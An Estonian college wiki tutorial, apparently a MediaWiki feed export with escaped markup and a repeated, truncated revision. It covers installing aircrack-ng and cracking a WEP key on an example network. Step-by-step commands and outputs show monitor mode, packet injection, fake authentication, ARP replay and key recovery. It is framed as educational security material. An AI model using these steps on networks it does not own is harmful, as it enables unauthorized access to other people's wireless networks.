aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89338</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89338"/>
		<updated>2015-05-25T20:13:13Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Kokkuvõte */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.&lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu&amp;lt;ref&amp;gt;[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
